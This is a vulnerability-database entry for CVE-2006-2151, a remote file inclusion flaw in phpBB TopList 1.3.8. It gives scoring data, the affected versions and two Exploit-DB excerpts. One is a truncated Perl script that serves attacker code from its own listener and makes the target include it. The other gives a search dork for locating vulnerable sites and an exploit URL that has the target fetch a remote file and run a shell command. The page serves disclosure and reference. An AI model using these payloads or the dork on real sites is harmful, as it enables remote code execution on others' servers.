CVE-2006-2151
Published 2006-05-03
Priority: P3 (44) · Severity: high · CVSS 2.0 base score: 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: public exploit code indexed (see Exploit-DB entries below)
EPSS: 10.98% (95.3rd percentile)
PHP remote file inclusion vulnerability in toplist.php in phpBB TopList 1.3.8 and earlier, when register_globals is enabled, allows remote attackers to include arbitrary files via the phpbb_root_path parameter.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpbb_group | phpbb_toplist | <= 1.3.8 | — |
No detection rules found.
Exploit-DB: TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (2)
Source: exploitdb · 2006-04-28
---
```perl
# TopList Hack for PHPBB
    "$hostname",
    LocalPort => '9999',
    Proto     => 'tcp',
    Listen    => 1,
    Reuse     => 1,
);
die "Could not create socket: $!\n" unless $sock;

# Child process: answer the single incoming HTTP request on port 9999
if (my $pid = fork) {
    my $new_sock = $sock->accept();
    my $request  = <$new_sock>;
    print $new_sock "HTTP/1.1 200 OK\n";
    print $new_sock "Content-Length: $content_length\n";
    print $new_sock "Content-Type: text/plain\n\n";
    print $new_sock "\n";
    close $new_sock;
    exit;
}

# Parent process: send the request that triggers the include of phpbb_root_path
print "[+]Injecting command . . .\n";
my $browser = LWP::UserAgent->new;
$browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
my $url = "http://$target/$dir/toplist.php";
my $response = $browser->post( $url,
    [
        'f'               => "toplist_top10",
        'phpbb_root_path' => "http://$hostname:9999/blah.php"
    ]
);
die "Received inv
```
Exploit-DB: TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (1)
Source: exploitdb · 2006-04-27
---
Title: TopList Hack for PHPBB <= 1.3.8 Remote File Inclusion
URL: http://www.phpbb2hacks.de/toplist-df148.html
Dork: inurl:"toplist.php" "powered by phpbb"
Credits: [Oo]
Exploit: /toplist.php?f=toplist_top10&phpbb_root_path=http://yourhost/cmd.gif?cmd=ls
# milw0rm.com [2006-04-27]
No writeups or analysis indexed.
References:
- http://secunia.com/advisories/19884
- http://www.osvdb.org/25260
- http://www.vupen.com/english/advisories/2006/1601
- https://exchange.xforce.ibmcloud.com/vulnerabilities/26172
- https://www.exploit-db.com/exploits/1722
- https://www.exploit-db.com/exploits/1724